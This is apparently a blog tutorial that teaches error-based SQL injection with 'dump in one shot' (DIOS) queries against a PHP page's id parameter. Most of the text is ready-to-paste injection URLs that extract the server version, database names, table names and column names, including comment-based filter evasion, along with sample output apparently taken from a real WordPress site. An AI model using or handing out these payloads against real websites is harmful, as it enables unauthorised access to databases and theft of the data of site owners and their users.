In This Tutorial You Will Learn How To Build Error Based Dump In Shot ( DIOS ) .
As We Know That in Error Based Query we Give Our Commands To server and it Gives Us result the Under a error .
If We Want to Get the version() then we Give Query Like this.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
we get the version printed on the page. version=5.5.42-cll
Now Lets get the Primary Database name.
http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -
and Here is our Primary Database.
this the Primary Database name "kkbaketo_wordpress" so this is our Primary Database name . if we want to get the other we usually Increase the LIMIT 0,1 to LIMIT 1,1
But we Can Also get all Databases Without Using the LIMIT.
Here Is Our SYNTAX for Getting All Databases.
(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)
Now Add this SYNTAX to Get all Databases.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -
and these our Databases.
information_schema,kkbaketo_wordpress
Next step is to Get The Tables.
Here is The Example.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
and we Get Table name under Error response ::
We Just GOT one TABLE Name. kkbaketop_category
it Was Our First Table name. we Can Get Next one and Then Another by Increasing the Value of LIMIT 0,1 to LIMIT 2,1 LIMIT 3,1
We Increase the LIMIT for Tables.
LIMIT 0,1 for 1st table.
LIMIT 1,1 for 2nd tables.
As We Know that we Can DUMP All Tables and Columns In UNION BASED injection.
in ERROR BASED Dump in one Shot ( DIOS ) we can not Dump All Tables/Columns as Like UNION BASED Injection.
But We Can Get some Tables/Columns from The Database by BUILDING our Query.
Here is Our SYNTAX For Tables.
(select group_concat(table_name) from information_schema.tables where table_schema=database())
Now add this SYNTAX in our DIOS Query.
(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)
Our DIOS Query is Ready for Tables.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)-- -
kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product
We Can also HTML TAG to show All Tables in a New Line.
HTML TAG=<BR>
we can use it by encoding it in HEX Value or Putting the Single Quote Before and After the HTML TAG.
HEX Value=3c42523e we have to use 0x before the HEX Value to Use The HTML TAG.
HEX Value=0x3c42523e
Putting Single Quote='<BR>'
PUT The HTML TAG Before The Table_name.
Hmmm now Lets Add this Tag to our Error Based DIOS Query and execute it.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name) from information_schema.tables where table_schema=database())))x)a)-- -
Now All Tables are in NEW line.
Next Step is we Have to Get Columns.
Here Is The SYNTAX for Columns.
(select group_concat(3c42523e,table_name,0x3a,column_name) from information_schema.columns where table_schema=database())
Add this SYNTAX in DIOS Query and Execute it for Getting Columns from Each Table.
And Here is the FINAL DIOS Query for Error Based Getting Tables And Columns in one SHOT.
http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database())))x)a)-- -
You Can Se The Tables And Columns Printed On The ScreenShot.
Hope You like The Tutorial.
No comments:
Post a Comment